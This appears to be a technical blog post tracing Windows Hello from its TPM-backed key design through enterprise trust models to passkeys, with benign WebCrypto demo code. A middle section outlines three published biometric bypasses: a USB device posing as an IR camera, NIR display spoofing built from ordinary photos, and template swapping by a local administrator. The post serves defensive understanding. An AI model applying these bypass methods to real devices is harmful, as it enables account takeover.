&lt;p&gt;September 2013. Apple unveils the iPhone 5S [@apple-touchid] with a fingerprint sensor embedded in the home button. It was not the first phone with a fingerprint reader -- Motorola&apos;s ATRIX 4G shipped with a biometric fingerprint reader in 2011 [@motorola-atrix]. But it was the first one that hundreds of millions of people actually used.&lt;/p&gt;
&lt;p&gt;What made Touch ID different was not the sensor. It was the Secure Enclave -- a dedicated secure subsystem integrated into Apple&apos;s system-on-chip and isolated from the main processor [@apple-secure-enclave]. The enclave runs its own microkernel, stores biometric material in protected memory, and keeps the matching pipeline outside the reach of normal iOS processes. Apple designed it so the biometric path stayed inside the enclave boundary rather than becoming just another app-visible API.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Apple controlled the sensor, the SoC, the Secure Enclave hardware, and iOS. This vertical integration meant the entire biometric pipeline -- from sensor capture through template matching to key release -- could be designed as a single trust chain. No Windows OEM could match this in 2013 because the sensor, CPU, and OS came from three different vendors with no unified security model.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;That architecture established a pattern that Windows Hello would later follow with the TPM. Both isolate secrets in hardware, but they do different jobs: the Secure Enclave is a richer coprocessor that protects both biometric processing and keys, while the TPM is a narrower trust anchor for key storage, signing, and attestation. Apple&apos;s newer Secure Enclave documentation also emphasizes encrypted enclave memory, whereas Windows later needed ESS and &lt;a href=&quot;https://paragmali.com/blog/the-windows-secure-kernel/&quot; rel=&quot;noopener&quot;&gt;VBS&lt;/a&gt; to give its broader PC system a comparable isolation boundary [@apple-secure-enclave; @ms-ess].&lt;/p&gt;
&lt;p&gt;Touch ID proved two things simultaneously: that consumer biometrics could be both secure and delightful, and that the key to secure biometrics was hardware isolation, not better algorithms.&lt;/p&gt;
&lt;p&gt;The FIDO Alliance had already been working on the standards side. Founded in July 2012 [@fido-launch] by Michael Barrett (PayPal&apos;s CISO), Ramesh Kesanupalli (Nok Nok Labs), and partners including Lenovo, Validity Sensors, and Infineon, the Alliance set out to create open standards for strong authentication that would replace passwords. Its first protocols split the problem in two: UAF defined a passwordless flow where a device-local biometric or PIN unlocks a per-service key pair [@fido-uaf], while U2F defined a hardware-token second factor that signs a challenge after the user taps the device [@fido-u2f]. FIDO2 later unified these ideas into the WebAuthn + CTAP stack used for passkeys today [@fido-how].&lt;/p&gt;
&lt;p&gt;The convergence was forming: consumer demand (Apple proved people wanted biometrics), open standards (FIDO defined how it should work), and enterprise need (Microsoft tracked thousands of password attacks per second). Apple showed &lt;em&gt;what&lt;/em&gt; was possible. The FIDO Alliance defined &lt;em&gt;how&lt;/em&gt; it should work. Microsoft was about to show how to do it at the scale of an entire operating system.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;The Breakthrough: Windows Hello&apos;s Architecture&lt;/h2&gt;
&lt;p&gt;On March 17, 2015, Joe Belfiore announced Windows Hello. The key insight was not an algorithm -- it was an architecture. What if the biometric never leaves the device, and the authentication secret is a cryptographic key that even the server never sees?&lt;/p&gt;

A dedicated security chip soldered to a computer&apos;s motherboard (or implemented in firmware) that generates, stores, and manages cryptographic keys. The TPM can create key pairs where the private key is physically bound to the chip and cannot be exported -- even the operating system cannot extract it. Windows Hello uses TPM 2.0 to seal authentication keys.

A cryptographic system using two mathematically related keys: a public key (shared openly) and a private key (kept secret). Data encrypted with one key can only be decrypted with the other. In Windows Hello, the TPM holds the private key and signs authentication challenges; the server holds only the public key, which is useless to an attacker.
&lt;p&gt;Here is how Windows Hello authentication [@ms-whfb] works:&lt;/p&gt;

sequenceDiagram
    participant U as User
    participant B as Biometric Sensor
    participant D as Device OS
    participant T as TPM Chip
    participant S as Identity Server
    U-&amp;gt;&amp;gt;B: Present face or fingerprint
    B-&amp;gt;&amp;gt;D: Capture biometric sample
    D-&amp;gt;&amp;gt;D: Match against stored template
    Note over D: Local verification only
    D-&amp;gt;&amp;gt;T: Request private key release
    T-&amp;gt;&amp;gt;T: Verify TPM-bound policy
    T--&amp;gt;&amp;gt;D: Private key available for signing
    S-&amp;gt;&amp;gt;D: Send challenge nonce
    D-&amp;gt;&amp;gt;D: Sign nonce with private key
    D-&amp;gt;&amp;gt;S: Return signed assertion
    S-&amp;gt;&amp;gt;S: Verify signature with public key
    S-&amp;gt;&amp;gt;D: Authentication success
&lt;p&gt;&lt;strong&gt;Step 1: Enrollment.&lt;/strong&gt; The TPM generates an asymmetric key pair -- RSA-2048 or ECDSA P-256. The private key is sealed inside the TPM and cannot be exported. The public key is registered with the identity provider (Azure AD, Entra ID, or on-premises AD) [@ms-whfb].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Step 2: Biometric enrollment.&lt;/strong&gt; The user registers their face (via a near-infrared camera) or fingerprint. The biometric template is stored locally on the device, protected by the OS.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Step 3: Authentication.&lt;/strong&gt; The user presents their biometric gesture. The device verifies it locally against the stored template. If the match succeeds, the TPM releases the private key. The identity server sends a random challenge nonce; the device signs it with the private key and returns the signed assertion. The server verifies the signature using the stored public key. No shared secret ever crosses the network.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Windows Hello&apos;s breakthrough was architectural, not algorithmic. By pairing biometrics with hardware-backed asymmetric cryptography, it eliminated shared secrets entirely. No biometric data ever leaves the device. No password hash sits on a server waiting to be stolen. Each authentication is a fresh, unreplayable cryptographic signature.&lt;/p&gt;
&lt;/blockquote&gt;

The probability that a biometric system incorrectly accepts an unauthorized person. Windows Hello requires a facial recognition FAR below 0.001% (1 in 100,000) [@ms-biometric-reqs]. Apple&apos;s Face ID is documented at less than 0.0001% (1 in 1,000,000) for a single enrolled face [@apple-faceid-security]. Lower is better -- but zero is theoretically impossible.

A camera technology that captures light in the 700--1000 nanometer wavelength range, invisible to the human eye. Windows Hello uses NIR cameras because infrared illumination works regardless of ambient lighting and is harder to spoof with printed photos or screens -- standard displays do not emit near-infrared light. Or so everyone assumed until 2025.
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Without a TPM, Windows Hello falls back to software key storage, dramatically weakening the security model. The private key becomes a file protected by the OS rather than a secret sealed in tamper-resistant silicon. Always verify TPM 2.0 is present and active before relying on Hello&apos;s security properties.&lt;/p&gt;
&lt;/blockquote&gt;

A Trusted Platform Module is not a general-purpose processor. It is a purpose-built chip (or firmware module) designed for a narrow set of cryptographic operations: key generation, key storage, signing, and attestation.&lt;p&gt;When Windows Hello enrolls a user, the TPM generates a key pair using its internal random number generator. The private key never exists outside the chip&apos;s boundary -- it is generated inside the TPM and stays there. The TPM enforces access policies: it will only release the key for signing after the device OS confirms that the biometric match succeeded. Even a compromised operating system kernel cannot extract the private key from a hardware TPM.&lt;/p&gt;
&lt;p&gt;This is fundamentally different from software key storage, where the key is a file on disk that any sufficiently privileged process can read.
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;
&lt;h3&gt;The PIN paradox&lt;/h3&gt;
&lt;p&gt;Windows Hello also revived the humble PIN -- and made it more secure than a complex password. A Hello PIN [@ms-whfb] is device-bound: it unlocks the TPM-stored private key on that specific device. A stolen PIN is useless without physical access to the hardware. Compare this to a password, which works from any device on earth. A 4-digit PIN on Windows Hello is architecturally more secure than a 20-character password reused across services.Microsoft Passport was briefly announced as a separate product in early 2015 -- the cryptographic key infrastructure behind Windows Hello. By late 2015, the branding was merged. &quot;Microsoft Passport&quot; was retired and its functionality absorbed into &quot;Windows Hello&quot; and &quot;Windows Hello for Business.&quot; The separate brand caused market confusion and was quickly abandoned.&lt;/p&gt;
&lt;p&gt;The biometric FAR can be expressed mathematically. For a face recognition system with $n$ enrolled users and a per-comparison FAR of $p$, the probability of at least one false acceptance across all comparisons is:&lt;/p&gt;
&lt;p&gt;$$P(\text{false accept}) = 1 - (1 - p)^n$$&lt;/p&gt;
&lt;p&gt;For Windows Hello&apos;s required FAR of $10^{-5}$ [@ms-biometric-reqs] and a single user, this gives a 0.001% chance per authentication attempt. With 1,000 attempts, the cumulative probability rises to roughly 1% -- which is why lockout policies and anti-hammering protections exist.&lt;/p&gt;
&lt;p&gt;{`
// This demonstrates the core idea behind Windows Hello&apos;s authentication.
// In the real system, the private key lives in the TPM and never leaves.&lt;/p&gt;
&lt;p&gt;async function simulateHelloAuth() {
  // Step 1: Enrollment -- generate key pair (TPM does this in hardware)
  const keyPair = await crypto.subtle.generateKey(
    { name: &quot;ECDSA&quot;, namedCurve: &quot;P-256&quot; },
    true, // extractable for demo only; TPM keys are NOT extractable
    [&quot;sign&quot;, &quot;verify&quot;]
  );
  console.log(&quot;Key pair generated (simulating TPM enrollment)&quot;);&lt;/p&gt;
&lt;p&gt;  // Step 2: Server sends a challenge nonce
  const challenge = crypto.getRandomValues(new Uint8Array(32));
  console.log(&quot;Server challenge:&quot;, Array.from(challenge.slice(0, 8)).map(b =&amp;gt; b.toString(16).padStart(2, &apos;0&apos;)).join(&apos;&apos;));&lt;/p&gt;
&lt;p&gt;  // Step 3: Device signs the challenge with the private key
  const signature = await crypto.subtle.sign(
    { name: &quot;ECDSA&quot;, hash: &quot;SHA-256&quot; },
    keyPair.privateKey,
    challenge
  );
  console.log(&quot;Signed assertion:&quot;, new Uint8Array(signature).slice(0, 16).join(&apos;,&apos;) + &apos;...&apos;);&lt;/p&gt;
&lt;p&gt;  // Step 4: Server verifies with the public key
  const valid = await crypto.subtle.verify(
    { name: &quot;ECDSA&quot;, hash: &quot;SHA-256&quot; },
    keyPair.publicKey,
    signature,
    challenge
  );
  console.log(&quot;Server verification:&quot;, valid ? &quot;SUCCESS&quot; : &quot;FAILED&quot;);
  console.log(&quot;\nNote: The private key never left the device.&quot;);
  console.log(&quot;The server only has the public key -- useless to an attacker.&quot;);
}&lt;/p&gt;
&lt;p&gt;simulateHelloAuth();
`}&lt;/p&gt;
&lt;p&gt;Windows Hello solved the fundamental password problem: no shared secrets ever traverse the network. But the story does not end here -- because researchers would soon discover that protecting the key was not enough if you could not trust the camera.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;The Enterprise Gambit: Windows Hello for Business&lt;/h2&gt;
&lt;p&gt;Windows Hello delighted consumers. But enterprise IT administrators asked a harder question: how do I deploy this to 50,000 machines managed by Active Directory?&lt;/p&gt;

The W3C Web Authentication API -- a browser standard that lets websites request public-key-based authentication from platform authenticators (like Windows Hello) or roaming authenticators (like security keys). WebAuthn became a W3C Recommendation on March 4, 2019, forming the browser-side component of the FIDO2 standard alongside CTAP (Client-to-Authenticator Protocol).
&lt;p&gt;Windows Hello for Business (WHfB) [@ms-whfb] launched in 2016 with two trust types, each carrying its own infrastructure burden:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Certificate Trust&lt;/strong&gt; required a full Public Key Infrastructure -- a Certificate Authority hierarchy, CRL distribution points, certificate templates, and ADFS (Active Directory Federation Services). For organizations that already had PKI, this was a natural fit. For everyone else, it meant weeks of setup.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Key Trust&lt;/strong&gt; required Windows Server 2016+ domain controllers with AD schema extensions. Simpler than Certificate Trust, but still demanded on-premises infrastructure that many cloud-first organizations were trying to eliminate.Yogesh Mehta, Principal Group Program Manager at Microsoft, evangelized Windows Hello for Business at Ignite 2016. He would later be credited as a key figure in the FIDO2 certification effort. The original Belfiore blog post URL announcing Windows Hello is now lost to link rot.&lt;/p&gt;
&lt;p&gt;Two milestones accelerated adoption. In March 2019, WebAuthn became a W3C Recommendation [@w3c-webauthn] -- a universal browser API for public-key authentication. Android had already been FIDO2-certified in February 2019 [@fido-android-certification]; two months after WebAuthn&apos;s recommendation, Windows Hello became one of the first FIDO2-certified platform authenticators built into a desktop operating system [@fido-certification]. Together, these meant that Windows Hello could authenticate not just to Windows, but to any FIDO2-supporting website through any modern browser.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Unless you have specific PKI requirements, Cloud Trust -- announced by Microsoft in 2022 [@ms-cloud-trust-ga] -- eliminates much of the complexity of certificate and key trust deployments. It requires Entra ID configuration and Microsoft Entra Kerberos rather than a full on-prem PKI or ADFS stack, which is why Microsoft now treats it as the default recommendation for many hybrid organizations.&lt;/p&gt;
&lt;/blockquote&gt;


flowchart TD
    A[Choose a WHfB Trust Model] --&amp;gt; B{Cloud-native org using Entra ID?}
    B --&amp;gt;|Yes| C[Cloud Trust -- Recommended]
    B --&amp;gt;|No| D{On-prem AD still required?}
    D --&amp;gt;|Yes| E{Existing PKI infrastructure?}
    D --&amp;gt;|No| C
    E --&amp;gt;|Yes| F[Certificate Trust]
    E --&amp;gt;|No| G[Key Trust]
    C --&amp;gt; H[Simplest deployment: Entra ID only]
    F --&amp;gt; I[Most complex: CA + CRL + ADFS]
    G --&amp;gt; J[Moderate: Server 2016+ DCs required]
&lt;p&gt;&lt;strong&gt;Cloud Trust&lt;/strong&gt; delegates all validation to Entra ID. No on-premises PKI, no ADFS, no certificate templates. Best for organizations that are cloud-native or hybrid with Azure AD.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Key Trust&lt;/strong&gt; requires Windows Server 2016+ domain controllers with AD schema extensions. Choose this if you need on-premises AD support but do not have PKI.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Certificate Trust&lt;/strong&gt; requires the full PKI stack -- CA hierarchy, CRL distribution, ADFS. Choose this only if your organization already has PKI infrastructure and needs certificate-based authentication for regulatory compliance.&lt;/p&gt;
&lt;p&gt;Enterprise deployment was painful -- multiple trust models confused administrators, and adoption was slower than hoped. But it was about to get much worse. In July 2021, a researcher with a low-cost USB board would demonstrate that Windows Hello&apos;s most basic assumption was wrong.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;The Security Arms Race: When Researchers Fought Back&lt;/h2&gt;
&lt;p&gt;Omer Tsarfati had a simple question: what happens if you plug in a USB device that &lt;em&gt;claims&lt;/em&gt; to be an IR camera? The answer would force Microsoft to rethink Windows Hello&apos;s entire trust model.&lt;/p&gt;
&lt;h3&gt;The USB camera bypass (CVE-2021-34466)&lt;/h3&gt;
&lt;p&gt;In July 2021, Tsarfati at CyberArk Labs [@cyberark-bypass] revealed that Windows Hello&apos;s facial recognition accepted input from any USB device presenting itself as an IR camera -- with no attestation, no hardware trust verification, and no device identity check.Tsarfati&apos;s attack required only a single IR frame -- not video, not a 3D reconstruction, just one static infrared image of the target&apos;s face. The simplicity of the attack was what made it so alarming.&lt;/p&gt;
&lt;p&gt;Using an NXP evaluation board [@cyberark-bypass], Tsarfati constructed a custom USB device that replayed a single IR frame of a target&apos;s face. Plug it in, and Windows Hello authenticated the attacker as the target. At the time, 85% of Windows 10 users employed Windows Hello [@cyberark-bypass] -- making this a massive attack surface.&lt;/p&gt;
&lt;p&gt;The insight was devastating: the TPM protected the key, but nobody protected the camera. Windows Hello&apos;s threat model assumed trusted camera hardware. The USB specification makes no such guarantee.&lt;/p&gt;

A Windows feature that uses the hardware hypervisor to create an isolated virtual environment (Virtual Trust Level 1, or VTL1) separated from the main OS kernel (VTL0). Even if an attacker gains SYSTEM-level access to the Windows kernel, they cannot read memory in VTL1. Windows Hello&apos;s Enhanced Sign-in Security uses VBS to isolate biometric processing.
&lt;h3&gt;Microsoft&apos;s response: ESS and VBS&lt;/h3&gt;
&lt;p&gt;Microsoft&apos;s answer came with Windows 11: Enhanced Sign-in Security (ESS) [@ms-ess], which moved biometric matching into the VBS-protected enclave described above. Even a compromised Windows kernel cannot access templates or tamper with the comparison pipeline there.&lt;/p&gt;

flowchart TD
    subgraph VTL0[&quot;VTL0: Normal OS Environment&quot;]
        A[Windows Kernel]
        B[Applications]
        C[Standard Drivers]
    end
    subgraph VTL1[&quot;VTL1: Secure World -- ESS&quot;]
        D[Biometric Matching Engine]
        E[Encrypted Template Storage]
        F[Credential Isolation]
    end
    G[Hypervisor] --- VTL0
    G --- VTL1
    H[Secure Biometric Sensor] --&amp;gt; D
    A -.-&amp;gt;|Blocked by Hypervisor| D
    B -.-&amp;gt;|Blocked by Hypervisor| E
&lt;p&gt;Alongside ESS, Microsoft rolled out Cloud Trust in 2022 [@ms-cloud-trust-ga], eliminating the need for on-premises PKI for many deployments. Two problems -- biometric isolation and deployment complexity -- were finally being addressed in parallel.&lt;/p&gt;
&lt;h3&gt;Red Bleed: the NIR assumption shatters (CVE-2025-26644)&lt;/h3&gt;
&lt;p&gt;The arms race was not over. In August 2025, researchers Bowen Hu, Kuo Wang, and Chip Hong Chang at Nanyang Technological University presented &quot;Red Bleed&quot; [@red-bleed] at USENIX Security 2025. Microsoft had already patched CVE-2025-26644 [@wiz-cve] in April 2025, but the full attack was now public.&lt;/p&gt;
&lt;p&gt;Windows Hello&apos;s NIR facial recognition relied on a critical assumption: no commercial display can emit near-infrared light. The researchers shattered this assumption [@nvd-red-bleed] with a custom-built LCD screen costing less than $400 that could display NIR images. They trained a Variational Autoencoder to convert widely available RGB photos -- from social media, video calls, public sources -- into convincing NIR facial videos. The result: a presentation attack that bypassed Windows Hello face authentication and prompted liveness-detection hardening [@red-bleed-pdf]. The Red Bleed attack name references the &quot;red bleed&quot; phenomenon in LCD panels where a small amount of near-infrared light leaks through the color filters -- the researchers amplified this effect with a custom panel.&lt;/p&gt;
&lt;p&gt;Microsoft&apos;s April 2025 patch strengthened liveness detection and anti-spoofing measures for NIR authentication.&lt;/p&gt;
&lt;h3&gt;Faceplant: the template swap (CVE-2026-20804)&lt;/h3&gt;
&lt;p&gt;The third major attack came from ERNW Research in August 2025. At Black Hat USA 2025, Baptiste David and Tillmann Oßwald&apos;s official conference briefing &quot;Windows Hell No for Business&quot; [@blackhat-windows-hell-no] detailed the Faceplant template-injection attack, which they later documented technically on ERNW&apos;s research blog [@faceplant].&lt;/p&gt;
&lt;p&gt;In practice, an attacker with local administrator privileges could enroll their own face on one machine, extract the resulting template, and transplant it into the victim&apos;s biometric database on the target device. After injection, Windows Hello accepted the attacker&apos;s face for the victim&apos;s account. ERNW traced the weakness to software-protected templates that a local administrator could extract and replace on non-ESS systems [@faceplant].&lt;/p&gt;
&lt;p&gt;ESS blocks this attack completely -- biometric templates in VTL1 are inaccessible even to local administrators. But many enterprise PCs lack ESS-compatible hardware.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Many enterprise PCs -- particularly those shipped without an ESS-certified built-in biometric sensor, including many AMD-based and older Intel-based machines -- lack ESS capability. On these machines, biometric templates remain in software-protected storage vulnerable to the Faceplant attack. Verify hardware compatibility before assuming biometric isolation is active.&lt;/p&gt;
&lt;/blockquote&gt;

flowchart TD
    A[&quot;2015: Windows Hello Launch&quot;] --&amp;gt; B[&quot;2021: CVE-2021-34466\nUSB Camera Spoofing&quot;]
    B --&amp;gt; C[&quot;Microsoft Response:\nESS + VBS Isolation&quot;]
    C --&amp;gt; D[&quot;2025: CVE-2025-26644\nRed Bleed NIR Attack&quot;]
    D --&amp;gt; E[&quot;Microsoft Response:\nLiveness Detection Update&quot;]
    E --&amp;gt; F[&quot;2025: CVE-2026-20804\nFaceplant Template Injection&quot;]
    F --&amp;gt; G[&quot;Defense: ESS Hardware\nIsolation Blocks Attack&quot;]
    G --&amp;gt; H[&quot;Ongoing: Adversarial ML\nArms Race&quot;]
    classDef fake fill:#7a3030,stroke:#c44b4b,color:#fce8e8
    class B fake,stroke:#333
    class D fake,stroke:#333
    class F fake,stroke:#333
    classDef real fill:#2f5a3a,stroke:#5fa872,color:#dff5e4
    class C real,stroke:#333
    class E real,stroke:#333
    class G real,stroke:#333
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Each generation of authentication protected a new layer -- but every layer revealed the next attack surface. The TPM protected the key. ESS protected the biometric pipeline. Liveness detection hardened NIR authentication. Security is never a single solution. It is a stack, and each layer needs its own defense.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The arms race revealed a humbling truth: biometric authentication is not a silver bullet. It is a layered defense -- and each layer needs its own protection. But while researchers probed Windows Hello&apos;s defenses, the industry was converging on something bigger.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;The Convergence: Passkeys and the Passwordless Future&lt;/h2&gt;
&lt;p&gt;May 5, 2022. Apple, Google, and Microsoft [@passkeys-announcement] -- three companies that agree on almost nothing -- issued a joint announcement: they were all committing to passkeys.&lt;/p&gt;

A FIDO2/WebAuthn credential built on the same public-key model as Windows Hello. Passkeys can be device-bound (like traditional Hello credentials, stored in the TPM) or synced across devices through a credential manager such as iCloud Keychain or Google Password Manager. The local biometric or PIN check stays on-device; the relying party only sees public keys and signatures.
&lt;p&gt;FIDO2 had a usability problem. Credentials were bound to a single device. Lose your laptop, lose your credentials. Passkeys solved this by introducing synced credentials -- private keys encrypted and distributed across a user&apos;s devices through their platform credential manager. The FIDO Alliance&apos;s protocol [@fido-how] maintained the cryptographic guarantees (no shared secrets, phishing resistance) while adding the portability users demanded.&quot;World Password Day&quot; was symbolically renamed &quot;World Passkey Day&quot; in May 2025, when Microsoft announced that new accounts would default to passwordless authentication.&lt;/p&gt;
&lt;h3&gt;The numbers tell the story&lt;/h3&gt;
&lt;p&gt;By May 2025, Microsoft made new accounts passwordless by default [@ms-passkeys]:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Nearly 1 million passkey registrations daily [@ms-passkeys]&lt;/li&gt;
&lt;li&gt;98% passkey sign-in success rate [@ms-passkeys] vs. 32% for passwords&lt;/li&gt;
&lt;li&gt;Passkey sign-ins 8x faster [@ms-passkeys] than password + MFA&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;How the platforms compare&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Dimension&lt;/th&gt;
&lt;th&gt;Windows Hello (WHfB)&lt;/th&gt;
&lt;th&gt;Apple Face ID / Passkeys&lt;/th&gt;
&lt;th&gt;Google Passkeys&lt;/th&gt;
&lt;th&gt;FIDO2 Hardware Keys&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Hardware root of trust&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://paragmali.com/blog/the-tpm-in-windows-one-primitive-twenty-five-years-and-the-c/&quot; rel=&quot;noopener&quot;&gt;TPM 2.0&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Secure Enclave&lt;/td&gt;
&lt;td&gt;TEE / Titan M&lt;/td&gt;
&lt;td&gt;On-key secure element&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Credential sync&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;No (device-bound)&lt;/td&gt;
&lt;td&gt;Yes (iCloud Keychain)&lt;/td&gt;
&lt;td&gt;Yes (Google PM)&lt;/td&gt;
&lt;td&gt;No (hardware-bound)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Cross-platform&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Windows only&lt;/td&gt;
&lt;td&gt;Apple + QR/BT bridge&lt;/td&gt;
&lt;td&gt;Android/Chrome + QR/BT&lt;/td&gt;
&lt;td&gt;Universal USB/NFC/BT&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;FAR (face)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&amp;lt; 0.001%&lt;/td&gt;
&lt;td&gt;&amp;lt; 0.0001%&lt;/td&gt;
&lt;td&gt;Varies by OEM&lt;/td&gt;
&lt;td&gt;N/A&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Enterprise management&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Intune, GP, Conditional Access&lt;/td&gt;
&lt;td&gt;Limited (Apple MDM)&lt;/td&gt;
&lt;td&gt;Android Enterprise&lt;/td&gt;
&lt;td&gt;Manual provisioning&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Recovery on device loss&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Re-enroll on new device&lt;/td&gt;
&lt;td&gt;iCloud backup restore&lt;/td&gt;
&lt;td&gt;Google Account restore&lt;/td&gt;
&lt;td&gt;Requires backup key&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;NIST AAL level&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;AAL2&lt;/td&gt;
&lt;td&gt;AAL2&lt;/td&gt;
&lt;td&gt;AAL2&lt;/td&gt;
&lt;td&gt;AAL3-eligible&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Best suited for&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Windows enterprise&lt;/td&gt;
&lt;td&gt;Apple platform&lt;/td&gt;
&lt;td&gt;Android / cross-platform web&lt;/td&gt;
&lt;td&gt;High-assurance regulated&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;Sources: Microsoft biometric requirements [@ms-biometric-reqs], Apple passkey security [@apple-passkeys-security], Google passkeys [@google-passkeys], FIDO specifications [@fido-specs]&lt;/p&gt;
&lt;p&gt;Google&apos;s passkey story is centered on Google Password Manager: passkeys created on Android or Chrome sync across Android, ChromeOS, Windows, macOS, Linux, and Chrome browsers where the same account is available [@google-passkeys]. FIDO2 hardware security keys (YubiKey, Google Titan) take the opposite approach: the credential stays on a dedicated secure element, works across platforms via USB/NFC/Bluetooth, and must be provisioned deliberately on each account [@fido-u2f; @fido-how]. That trade-off buys the highest assurance available today; multi-factor cryptographic hardware authenticators are the mainstream route to NIST AAL3 [@nist-aal].&lt;/p&gt;

sequenceDiagram
    participant U as User
    participant B as Browser
    participant A as Platform Authenticator
    participant S as Relying Party Server
    U-&amp;gt;&amp;gt;B: Click Register with Passkey
    B-&amp;gt;&amp;gt;S: Request registration options
    S-&amp;gt;&amp;gt;B: Return challenge + relying party info
    B-&amp;gt;&amp;gt;A: navigator.credentials.create()
    A-&amp;gt;&amp;gt;U: Prompt biometric verification
    U-&amp;gt;&amp;gt;A: Present face / fingerprint / PIN
    A-&amp;gt;&amp;gt;A: Generate key pair in TPM
    A-&amp;gt;&amp;gt;B: Return public key + attestation
    B-&amp;gt;&amp;gt;S: Send credential to server
    S-&amp;gt;&amp;gt;S: Store public key for user
    S-&amp;gt;&amp;gt;B: Registration complete
&lt;p&gt;{`
// This shows the structure of a WebAuthn registration request.
// In production, the challenge comes from your server.&lt;/p&gt;
&lt;p&gt;const registrationOptions = {
  publicKey: {
    // Random challenge from the server (32 bytes)
    challenge: crypto.getRandomValues(new Uint8Array(32)),&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// Your service identity
rp: {
  name: &quot;Example Corp&quot;,
  id: &quot;example.com&quot;
},

// User identity
user: {
  id: new Uint8Array([1, 2, 3, 4]),
  name: &quot;alice@example.com&quot;,
  displayName: &quot;Alice&quot;
},

// Acceptable key types (ES256 = ECDSA P-256)
pubKeyCredParams: [
  { type: &quot;public-key&quot;, alg: -7 }  // ES256
],

// Request a resident/discoverable credential (passkey)
authenticatorSelection: {
  residentKey: &quot;required&quot;,
  userVerification: &quot;required&quot;  // Biometric or PIN
},

// 5-minute timeout
timeout: 300000
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;  }
};&lt;/p&gt;
&lt;p&gt;console.log(&quot;Registration options structure:&quot;);
console.log(JSON.stringify(registrationOptions.publicKey.rp, null, 2));
console.log(&quot;\nKey algorithm: ES256 (ECDSA P-256)&quot;);
console.log(&quot;Resident key: required (discoverable passkey)&quot;);
console.log(&quot;User verification: required (biometric or PIN)&quot;);
console.log(&quot;\nIn production, call: navigator.credentials.create(registrationOptions)&quot;);
`}&lt;/p&gt;
&lt;h2&gt;Deploying Windows Hello Today&lt;/h2&gt;
&lt;p&gt;For consumers, the simplest path is built into Windows: open &lt;strong&gt;Settings &amp;gt; Accounts &amp;gt; Sign-in options&lt;/strong&gt;, create a Windows Hello PIN first, then enroll face or fingerprint if the hardware is present [@ms-whfb]. If Windows only offers PIN, the machine lacks a compatible biometric sensor. On a laptop with an IR camera or certified fingerprint reader, enrollment takes a few minutes and the credential becomes device-bound immediately.&lt;/p&gt;
&lt;p&gt;For enterprises, Microsoft now recommends starting with Cloud Trust unless certificate-based authentication is a hard requirement. A practical rollout checklist is short: confirm devices are Entra joined or hybrid joined, deploy Microsoft Entra Kerberos, verify Windows 10 21H2+/Windows 11 clients and Windows Server 2016+ read-write domain controllers in each site, then push &lt;strong&gt;Use Windows Hello for Business&lt;/strong&gt; plus &lt;strong&gt;Use cloud trust for on-premises authentication&lt;/strong&gt; through Intune or Group Policy [@ms-cloud-trust-ga]. That is dramatically lighter than standing up PKI, ADFS, and certificate templates.&lt;/p&gt;
&lt;p&gt;ESS deserves its own hardware check. A TPM alone is not enough: ESS depends on Windows 11, VBS-capable hardware, and compatible secure biometric sensors [@ms-ess]. Unsupported systems can still use Hello, but they fall back to the older software-protected biometric path. Hardware inventory determines whether you are getting the modern threat model or merely the old UX.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Start with a pilot group, require a Hello PIN for every enrolled user, and issue at least one backup FIDO2 security key to admins and help-desk staff. The cleanest password migration is additive: enroll Hello first, prove recovery works, then remove password prompts from the highest-value workflows last.&lt;/p&gt;
&lt;/blockquote&gt;
